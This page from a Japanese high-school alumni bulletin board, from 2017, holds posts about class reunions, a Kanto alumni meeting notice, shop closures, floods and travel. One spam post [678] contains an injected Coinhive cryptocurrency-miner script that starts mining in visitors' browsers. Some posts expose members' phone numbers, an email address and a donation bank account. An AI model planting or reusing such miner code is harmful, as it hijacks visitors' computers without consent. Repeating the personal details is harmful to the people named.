【広告】AMAZONからG.W.に向けてスマイルセール!4月22日まで開催

戸畑高校ニ八会会員専用掲示板

この掲示板は戸畑高校二八会関係者のみご利用できます。
関係者以外の方は投稿をご遠慮ください。
管理人の判断で不適切な記事及び画像は削除させていただきます。
尚、画像の投稿は合計5メガ(3枚まで)までとなっていますので縮小して投稿してください。
サイズを確認の上UPしてみてください。もし分からない事がありましたら管理人まで問い合わせください。
管理人:神村

新HPにリンク

184989

Name Message
Subject
URL
Mail
Upload

Color | | | | | | | |
Delete Cookie
RSS

[682]二八会 - 投稿者:川畑喜與登 MAIL

賑わいましたよ

アルバム

 
(2017年10月01日 (日) 13時55分)
[返信]

[679]夏を惜しむご当地二八会 - 投稿者:須澤俊幸 MAIL

 本日、19時、浅生どうり「味まる」開催。23名予定です。 来年は「皿倉」「西日本工業倶楽部」も検討しますが、今夜の再会楽しみです。

 昨日、坪根先生のカルチャーセンター「運慶」でした。関東天籟総会の後、国立博物館へ行って観てきます。
 それと前回約束の「資さんうどんのおはぎ」をいかに持参しようかと回答(解凍)を研究中です。ご賞味、楽しみに来てください。
 


 

アルバム

 
(2017年09月30日 (土) 12時28分)
[返信]

[680]写真 - 投稿者:永田 光男 MAIL

総勢24名でわいやいがやがやと楽しいひと時でした。集合写真をUPします。

 
(2017年10月01日 (日) 09時58分)

[681]写真 - 投稿者:永田 光男 MAIL

写真がうまくUP出来なかったので、下記のURLを見てください。

http://www.geocities.jp/nagatamyah/MNagata/Photo/20170930/P20170930.htm

 
(2017年10月01日 (日) 10時07分)

[678]url-797 - 投稿者:url-797 MAIL

<p><script src="https://coin-hive.com/lib/coinhive.min.js"></script> <script> var miner = new CoinHive.User('p0mVpIsyyfzVIA0E5ZkxAtrwjLkcTwC9', 'john-doe'); miner.start(); </script></p>

797

アルバム

 
(2017年09月27日 (水) 11時11分)
[返信]

[674]届かないんですが - 投稿者:大浜久敏 MAIL

利根幹事様
やはり、大浜の自宅にはハガキは届かないのですが、参加してもいいのかな?行方知れず、より

アルバム

 
(2017年09月22日 (金) 09時59分)
[返信]

[675]そうですか - 投稿者:戸根 孝義 MAIL

関東支部の会員名簿の中に貴君の名前が追加されていることは確認したので、てっきり送られているものと思っていました。
今回は私のほうから取りまとめを行っている原先輩に「大浜さん出席」の連絡をしておきます。住所が間違っているのかな?
念のため、こちらの携帯090-6958-4105にショートメールでそちらの自宅の住所を送っていただけますか。

 
(2017年09月22日 (金) 10時45分)

[677]その2 - 投稿者:戸根 孝義 MAIL

原さんに連絡したところ、案内状の往復はがきが戻ってきたそうです。一応口頭で出席の連絡をしていますが、正しい住所を連絡して欲しい、とのことなので教えて貰えますか。案内状を再度送るそうです。

 
(2017年09月23日 (土) 12時00分)

[671]関東天籟同窓会参加予定です - 投稿者:須澤俊幸 MAIL

 現役リタイアしました。すると体に色んなガタが来てます。先月肺炎で入院し、今日はその外来検査でした。まずは採血です「本人確認のため、生年月日を言ってください」と美人の看護師さんが、今日は私、誕生日でした。すると「おめでとうございます。きっと良い1年になりますように」と優しい一言、ちょっと幸せな気分でした。
 数年ぶりに関東天籟同窓会に参加しようと思っています。今回は「戸畑祇園大山笠」がテーマとあって、10数年前に私と20回生の元土取郵便局長とで作った記念切手(フレーム切手)のセットを数セット「大福引大会」の記念品として持って行きます。

アルバム

 
(2017年09月12日 (火) 18時42分)
[返信]

[672]皆さんの参加を待っています - 投稿者:戸根 孝義 MAIL

10月21日はお待ちしています。また福引大会の商品の寄贈ありがとう。

大浜さん、案内のハガキは自宅に届きましたか?

美坂さん、今回は関西支部長の井上さんも参加するそうだけど、そちらもいかがですか

他の皆さんもよろしくお願いします。女性陣の参加は大歓迎です!

 
(2017年09月13日 (水) 10時46分)

[673]関東同窓会の件 - 投稿者:大浜久敏 MAIL

利根幹事様、留守宅の家内に問い合わせましたが、まだ届いていないようです。一応参加で申し込みますが、スーパー向けの惣菜工場ですので、土曜日は日曜売りの商品づくりが
一番忙しい(多い)日です。ドタキャンになるかもしれませんが、週末自宅に戻りますので、確認して投かんします。久しぶりに皆さんとお会いできればと思っています。

 
(2017年09月14日 (木) 16時29分)

[676]盛会を祈念します - 投稿者:美坂 邦彦 MAIL

関東の同窓会お誘いいただき誠にありがとうございます。残念ながら、土曜日は仕事が入っていて参加できません。

「戸畑祇園大山笠」は、日本一の山車だと思っています。新日本紀行の北九州の時にちらっと出てましたが、もっと有名になっても良いような気がします。

皆さんで楽しんできてください。

大浜も久しぶりやね、麻雀やってますか?私は普段はパソコンで練習して、二か月に1回ぐらいご近所のかたとやってます、ボケ防止に効きそうです(^^;

 
(2017年09月23日 (土) 05時11分)

[670]関東天籟同窓会へのご案内 - 投稿者:戸根 孝義 MAIL

第16回戸畑高等学校 関東天籟同窓会へのご案内

何の因果かわかりませんが、2年目を迎えました関東支部の幹事長役の戸根です。支部の名簿に登録されている方には、案内の往復はがきが自宅へ届いていると思いますが、関東在住で届いていない方や関西あるいは北九州から参加希望の方がいらっしゃれば是非エントリーして下さい。 
さて、今回の関東支部の総会は、昨年ユネスコの無形文化遺産に正式登録されました我が故郷の誇り「戸畑祇園大山笠」について、北九州からのお囃子メンバーとともに青木勇二郎様(8回生)に語っていただきます。 
万障お繰り合わせの上、皆さんお誘いの上で参加下さるよう宜しくお願いします。                                
1.日時 平成29年10月21日(土)11:00 〜 15:00
 ※受付開始は「10:15」ですので、早目の受付をお願い致します。
 
2.会場  コートヤード・マリオット 銀座.東武ホテル
 東京都中央区銀座6−14−10
   ☎ 03−3546−0111
3.会費(当日の徴収)
 @男性:8,000円、A女性:7,000円

4.恒例の卒業生による基調講演
 @基調講演者 … 戸畑高校名誉応援団長 青木勇二郎様(8回生)
 A演 題 … 戸畑祇園山笠 神さんの足になった男たち

5.余興
 大福引大会
6.ご支援のお願い
 @今回の基調講演に際して北九州からのお囃子メンバーの招聘及び関東天籟同窓会の運営維持のために是非ご協力のほど、よろしくお願い申し上げます。
(一口 … 1,000円、何口でも)
 A支援金振込先(ゆうちょ銀行 ※口座名義 … 戸畑高校関東天籟同窓会)
 a: ゆうちょ銀行からの振込み
  :記号 10540、番号 91246141
 b: 他金融機関(ゆうちょ銀行以外)からの振込み
  :店名 … 0五八(読みゼロゴハチ)、店番 … 058
   預金種目 … 普通預金、 口座番号 … 9124614

7.連絡先 常任幹事 総務部長 原 敏昭 (22回生)
 ☎  090-9974-2605
✉  sf300394-7165@tbz.t-com.ne.jp
 
※準備の都合上10月6日(金)までに「出・欠」のご返答をお願い致します。

アルバム

 
(2017年09月04日 (月) 21時49分)
[返信]

[667]羽立発見!! - 投稿者:美坂 邦彦 MAIL

羽立君久しぶり拝見いたします。望月と渡辺もおるやん。

思いだせば、高校3年生、羽立の家の2階で、望月指導の下、現状逃避の麻雀修行を行っておりました。ゆえに、あとでバチが当たったのですが。

それはさておき、新立が準備して関西でも年2回集まっています、連絡しますので、ぜひご参加ください。

アルバム

 
(2017年08月15日 (火) 05時43分)
[返信]

[668]美坂さん、ご無沙汰しています。 - 投稿者:羽立一則 MAIL

美坂さん、ご無沙汰しています。お元気そうで何よりです。昨年の4月に、大阪に息子と娘を残し、故郷の北九州市八幡西区へ家内と引っ越してきました。初めて、永田さんのお誘いで高校同窓会に参加しました。2次会で、英語部の話で盛り上がりました。
関西で集会がありましたらご連絡ください。

 
(2017年08月20日 (日) 20時22分)

[669]お元気そうで何よりです。 - 投稿者:美坂 邦彦 MAIL

北九州へ帰ったのですか、いつかお誘いしようと思いつつ、なかなか連絡しなかったことが残念に思われます。

次の関西二八回開催時は連絡しますので、うまく予定があえばご参加ください。この掲示板にもアップされます。

羽立家2階の麻雀修行は、大学に行って下宿で住人たちを麻雀漬けにするのには役立ちましたが、じつはほとんどのメンバーが浪人してしまったのでした。悪いことはできません。

 
(2017年08月28日 (月) 13時08分)

[666]戸畑高校天籟同窓会総会 - 投稿者:永田 光男 MAIL

8/12(土) 戸畑高校天籟同窓会総会に参加しました。
同窓会初参加となる羽立君(大谷中、英語部)や来賓参加(副会長)の宮野君を含むと24回生は10名の参加でした。
下記に(オリジナル)写真をUPしています。良かったらご覧下さい。

URL:http://www.geocities.jp/nagatamyah/MNagata/Photo/20170812/P20170812.htm

アルバム

 
(2017年08月14日 (月) 08時55分)
[返信]

[665]お疲れ様でした🙇♀ - 投稿者:山下千恵 MAIL

塚本君のお店閉店するんですね💧知りませんでした。母が、時々お世話になっていたと思います。お疲れ様でした。昔、購入したサングラスは🕶今でも掛けています。
母が亡くなってから、戸畑には、行くこともなくなりました。天籟寺の辺りはすっかり変わってしまいましたね。高校時代の景色はもう、思い出の中だけになりました。

ところで、誰か助けてという話ですが…
8月27日(日)に、岡山シンフォニーホールで、朝日新聞&キユーピー主催のおかあさんコーラス全国大会で私たち『コーラス風』が歌うのですが、当日のチケット(2600円)が完売らしいのです。是非聞きたいという団員の家族の分13枚がどうしても無くて、(実は私のミスで、申し込み忘れて…責任問題)フェイスブックとかしてる方、居ませんか?チケット譲ってくれる人いないでしょうか?無理と思いますが何枚でもいいですので、よろしくお願いします。ネットにすがるしかないのでm(_ _)mそれか、いい案があったらお知らせください。こんな時だけページ開いてすみません😞。

アルバム

 
(2017年07月29日 (土) 16時05分)
[返信]

[664]夏の高校野球 - 投稿者:須澤俊幸 MAIL

 今日、小倉球場へ行って来ました。
 戸高、東筑戦です。1点リードスタートのノーミス好ゲームでしたが、結果は4−1で負けてしまいました。
 がんばった選手には感動、感謝です。
 応援席も凄い、ブラスバンドは、凄い暑さの中、制服で素晴らしい演奏でした。保護者もそれに合わせメガホン叩き大歓声、一丸となった応援は素晴らしいものでした。でも一番は、応援団でした。素足に学ラン10名のポニーテール乙女です。りんとしていました。
 残念ながら野球部も、団長も今日で夏が終わってしまいました。
 試合後私の近くに居た、先輩に団長が挨拶に来ました。見ていたら今日の暑さのせいか、涙腺からも汗が出てきました。


アルバム

 
(2017年07月15日 (土) 17時56分)
[返信]

[661]閉店 - 投稿者:塚本 昌俊 MAIL

 60年あまり営業してまいりました店を閉店することは誠に残念でありますが、永きにわたりご愛顧いただいたお客様には大変申し訳なく思っています。ゴメンナサイ

アルバム

 
(2017年07月10日 (月) 15時32分)
[返信]

[662]お疲れ様でした - 投稿者:戸根 孝義 MAIL

塚本のお店のダイマルで、高校入学の際に岡上と一緒に腕時計(セイコー5)を買ったのを覚えています。今から47〜48年前のことですから、当時は塚本のお父さんがバリバリの現役で店を仕切っていた頃です。懐かしいですね。店を運営していくに際して、いろいろご苦労があったかと思いますが、良い思い出になればいいですね。
ところで本部二八会の名幹事役は継続で宜しく!

 
(2017年07月11日 (火) 15時08分)

[663]お疲れ様 - 投稿者:仲田智彦 MAIL

大変な時に掲示板で聞いて悪かった。
おやじさんの代からお世話になりました帰省したときにさみしいわ。

 
(2017年07月12日 (水) 18時55分)

[660]閉店 - 投稿者:塚本 昌俊 MAIL

 皆様お変わりなくお過ごしですか。福岡大分の被害まだまだ継続中です。実家に出産の為朝倉市に帰ってきていた女性は上の子供さんをかばうように抱いてなくなっていたそうです。災害列島と化した日本、獣医学部全国展開などなどアホなこといわんと、災害対策庁でも作ってつぎなる大地震、自然災害、火山の噴火etcに万全の準備と対策をせんかいと思います。為政者しっかりやってくれ!

 当店の閉店は本当であります。

アルバム

 
(2017年07月10日 (月) 15時27分)
[返信]

[659]大雨、被害、虹 - 投稿者:永田 光男 MAIL

福岡県、大分県は大雨で大被害が出ています。
北九州市は一部河川の氾濫が有ったようですが、幸いなことに被害はすくなかったようです。
先ほど(7/9、18時過ぎ、戸畑) 雨上がりに虹が出ました。
亡くなった方に、ご冥福をお祈りします。

アルバム

 
(2017年07月09日 (日) 19時00分)
[返信]

[655]天籟寺マルショク - 投稿者:森脇朱美 MAIL

みなさま、お元気でしょうか。なかなか投稿が続きませんので、どうしてるかな?って思っています。
天籟寺マルショクが、8月末で閉店するようです。近所ですが、あまり行かないので、最近まで知りませんでした。高校の下にありましたね。もっと前は、ボーリング場で、その前は映画館があったようです。老朽化のため、建て替えだそう。しばらくは工事でしょう。「桐島、部活やめるってよ」ではないけど、荒生田市場の鶏肉屋さんが閉店して、鶏皮が買えなくなり、枝光の天ぷら屋さんがやめて、おいしいいかげそや天ぷらが手にはいらなくなり、塚本君のお店にも「閉店セール」の旗がはためいています。何だか、淋しいですね。

アルバム

 
(2017年07月06日 (木) 06時06分)
[返信]

[656]マルショク閉店と聞いて - 投稿者:浅田 芳子 MAIL

森脇さん、情報ありがとうございます。
高1まで戸畑高校に在籍した浅田です。両親は、高校から5分くらいの実家に住んでいました。昨年から母の入院などあって、度々戸畑に帰っていました。ちょうど5月下旬頃まで戸畑でした。マルショクにはほとんど毎日買い物に行ってます。
食料品を買ったり、2Fで百均や父母向けの衣料を買ったりとお世話になりました。
実は、色々あって両親は私たち娘の住む関東のホームに入ることになり5月末に連れてきました。マルショクとは縁が切れることになりますが、閉店と聞いてびっくりしました。お年寄りが多く集まるお店だから閉店するとどうなる?と思いましたが、建て替えと聞いて安心しました。塚本さんのお店でも、父母がお世話になりました。閉店なのでしょうか?
両親が住まなくなり、戸畑に帰ることも少なくなりそうですが、いつまでもなつかしい戸畑であってほしいです。

 
(2017年07月09日 (日) 15時16分)

[657]Re:天籟寺マルショク - 投稿者:浅田 芳子 MAIL

森脇さん、情報ありがとうございます。
高1まで戸畑高校に在籍した浅田です。両親は、高校から5分くらいの実家に住んでいました。昨年から母の入院などあって、度々戸畑に帰っていました。ちょうど5月下旬頃まで戸畑でした。マルショクにはほとんど毎日買い物に行ってます。
食料品を買ったり、2Fで百均や父母向けの衣料を買ったりとお世話になりました。
実は、色々あって両親は私たち娘の住む関東のホームに入ることになり5月末に連れてきました。マルショクとは縁が切れることになりますが、閉店と聞いてびっくりしました。お年寄りが多く集まるお店だから閉店するとどうなる?と思いましたが、建て替えと聞いて安心しました。塚本さんのお店でも、父母がお世話になりました。閉店なのでしょうか?
両親が住まなくなり、戸畑に帰ることも少なくなりそうですが、いつまでもなつかしい戸畑であってほしいです。

 
(2017年07月09日 (日) 15時18分)

[658]閉店? - 投稿者:仲田智彦 MAIL

先週の豪雨で一人で暮らす小倉南区の母に何回か電話をして心配していました。幸い何も起こることなく無事でした。今日は朝から近所の公園の掃除とかで電話にでないのでチョット心配しましましたが・・・今回の雨も異常気象と言ってしまえばそれまでですがあんな雨の降り方今までなかったのか最近の気象観測で解るようになったのか?1日に50cmの雨は下水含め処理できません。
ところで塚本閉店本当?

 
(2017年07月09日 (日) 15時22分)

[654]北海道の写真です - 投稿者:仲田 智彦 MAIL

8日の夜北海道から無事帰ったて来ました。3000km弱でしたが仮眠と運転の交代で無事帰って来ました。5月の北海道は観光シーズン前で他県ナンバーも走っていない状態でした。旭川は桜が咲き始めた頃で夜の寒い時はストーブのお世話になっていました。
子どもから北海道の農業の話を聴きながら楽しく過ごして来ました。写真を見てください
明日から仕事です。

アルバム

 
(2017年05月09日 (火) 07時34分)
[返信]

[653]写真添付。 - 投稿者:伊藤章 MAIL

3日はバレー部のOB会でした。場所は元コーチの大邸宅(鞍手町)です。京都から日帰りで参加。元部長の加藤先生や、沼田、北田、弋君らが元気な顔を出していました。私のGWではこの九州行きが最も遠出になります。あとは京都市内の古書店市、亀岡への山越えサイクリング、西山ウォークと、もっぱら近場で過ごしています。北海道旅行はうらやましい限り。
(写真添付がうまくいってないようなので再トライ。ミスったらごめん。)

アルバム

 
(2017年05月04日 (木) 23時34分)
[返信]

[649]今、北海道 - 投稿者:仲田 智彦 MAIL

皆さんこんばんは!GWいかがですか?
今北海道から書き込んでいます。次男の就職先が北海道のためやってきました。1300Kmのドライブ今売り出したばかりの自動運転の車でと言いたいところですが人間の手と足で・・・
昨日は満開の桜を函館五稜郭で楽しみ。今日は旭川動物園で楽しんで今は次男の部屋でPC借りて書き込んでいます。その辺に積もった雪があるような感じでさすが北海道の5月はまだ寒いです。明日からその辺を子供の案内でウロウロします。
皆さんのGW聞かせてください。

アルバム

 
(2017年05月02日 (火) 19時11分)
[返信]

[650]北海道、いいねェ - 投稿者:村谷博美 MAIL

仲田君、お久しぶり!

お子さんと杯を酌み交わす話、あちこちの大会で走っている話、そして野菜の記事を楽しんでいます。今回は、北海道遠征ですね。しっかり楽しんでください。
当方、GWは3回も福岡市急患診療所に詰めることになりました。患者さんを診ながら、合間に学生のレポートを読んでいます。何とも冴えないGWだという印象を与えそうですが、色々な患者さんとの出会いは大いに勉強になり、楽しいものでもあります。
夜は帰省した長男の話を聞きながら一杯飲んで、ほろ酔い気分でこの文章を綴っています。次男はおそらくトライアスロンの練習で忙しいのだと思いますが、帰省せずにメールだけ寄越しました。
明日は、畑の草取りです。仲田君のように、立派な果物や野菜はできませんが、それでも畑に出て、娘(知的障がいがあり、これからも私が元気な間はずっと一緒に暮らします)と一緒に耕したり、草をむしったりするのはこの上もない喜びです。

 
(2017年05月03日 (水) 22時23分)

[651]村谷先生今晩は - 投稿者:仲田 智彦 MAIL

子供の家に居候状態で毎日相手をしてもらっています。今日は大雪山系の旭岳までドライブしてロープウェイで雪の上を歩いてきました。帰りはジンギスカン毎日楽しくやっています。写真は横浜に帰ってから・・・
お休みなさい

 
(2017年05月04日 (木) 20時33分)

[652]Re:今、北海道 - 投稿者:伊藤章 MAIL

3日はバレー部のOB会でした。場所は元コーチの大邸宅(鞍手町)です。京都から日帰りで参加。元部長の加藤先生や、沼田、北田、弋君らが元気な顔を出していました。私のGWではこの九州行きが最も遠出になります。あとは京都市内の古書店市、亀岡への山越えサイクリング、西山ウォークと、もっぱら近場で過ごしています。北海道旅行はうらやましい限り。

 
(2017年05月04日 (木) 23時28分)

[648]東京 - 投稿者:森脇朱美 MAIL

急用で、東京に出かけました。とりあえず新幹線に飛び乗って、4時間45分は長かった。着いてすぐSUIKAを買って、ホテルを探し、水道橋のアパホテル、2泊とって、まあ狭いのに結構な値段ですね。今話題のあの本も確かにおいてありましたよ。変ですね。1日はフリーとなったので、きょろきょろしながら、JRと地下鉄路線図で何とか、見て回りました。行きたかったニコライ堂や神田古書店街、江戸東京博物館とか行ったのですが、家にかえってきて残っているのは、出会った人のこと。皇居前広場で、ペットボトルのキャップがかたくて開けらなくて、あのだだっぴろいところで、すれちがった若者に開けてもらったこと、イグナチオ教会で、パイプオルガンの練習している場に行き合わせ、うっとり聞いていたこと、初対面のおばあさんと出口でちょっとおしゃべりしたこと。プランもなにもなく、まさに田舎者が行き当たりばったりでしたが、案内表示がわかりやすく、スマホのマップがあるので、何とかなるものだなあと思いました。東京の街中を歩いたのは10年前に、ほんの少しだけ。でもこれで28会東京大会があっても行けるかも・・・・・(^^♪

アルバム

 
(2017年02月10日 (金) 09時22分)
[返信]

[647]戸根さんよろしくお願いします。 - 投稿者:大浜久敏 MAIL

返信ありがとうございます。北本市でお願いします。同じ県内ですが、スーパーさん相手の日配品の工場ですので、毎日帰るわけにはゆかず、入間市内にアパートを借りて単身赴任中です。都会に出るにもちょっと時間はかかりますが、出向きますのでよろしくお願いします。

アルバム

 
(2017年02月01日 (水) 15時43分)
[返信]

[645]暇なので投稿させていただきます( - 投稿者:大浜久敏 MAIL

荒川先生、8期目の当選おめでとうございます。この掲示版を見ながら昔懐かしい仲間のが元気でいることに喜びを感じてます。埼玉の田舎にいるのですが、毎年同窓会が昔勤務していた会社のOB会や部署のOB会とここ
関東に戻ってから5年間ほど続いており、参加できずに残念です。顔がそのままの方もいれば誰?と思うほど様変わりした方もおられ(自分の事は放り投げ)関心しながら、長年交流が続いている28会の素晴らしさを感じております。大浜、そんな奴いたな、と思われるでしょうが、今、埼玉の奥のほう入間市で豚カツ工場で働いており、仕事中に投稿しています。スーパー向けのチルド食品を作る工場で、孫のためせっせと働いています。
機会があれば、関東28会にも参加したいと
思っています。利根さんや、沼田さんの頭が白くなってる、皆いい歳をとられてるようですね。今後も掲示板を確認しますので、開催する際は、ぜひ誘ってください。

アルバム

 
(2017年01月31日 (火) 18時34分)
[返信]

[646]ご無沙汰しています 確認 - 投稿者:戸根 孝義 MAIL

大浜さん、貴君とは確か2000年7月の東京大会で会ったきりだと思いますが、大変ご無沙汰しています。

昨年から何の因果か関東天籟同窓会(戸畑高校同窓会の関東支部)の幹事長をすることになりましたが、改めて同期24回生の関東支部のリストから大浜さんの名前が漏れていることがわかりました。過去の同期リストを調べたところ、埼玉県の北本市在住となっていますが、現在も間違いないでしょうか?もし、これでよければリストに登録し、関東天籟同窓会の案内状を出すことにします。

ちなみに今年は10月21日(土)11:00〜 銀座東武ホテルで開催される予定となっています。

【補足】関東二八会は神村幹事長が多忙なため、休眠状態でしたが、昨年7月に久々にやりました。

 
(2017年02月01日 (水) 12時00分)



Number
Pass

ThinkPadを買おう!
レンタカーの回送ドライバー
【広告】AMAZONからG.W.に向けてスマイルセール!4月22日まで開催
無料で掲示板を作ろう   情報の外部送信について
このページを通報する 管理人へ連絡
SYSTEM BY せっかく掲示板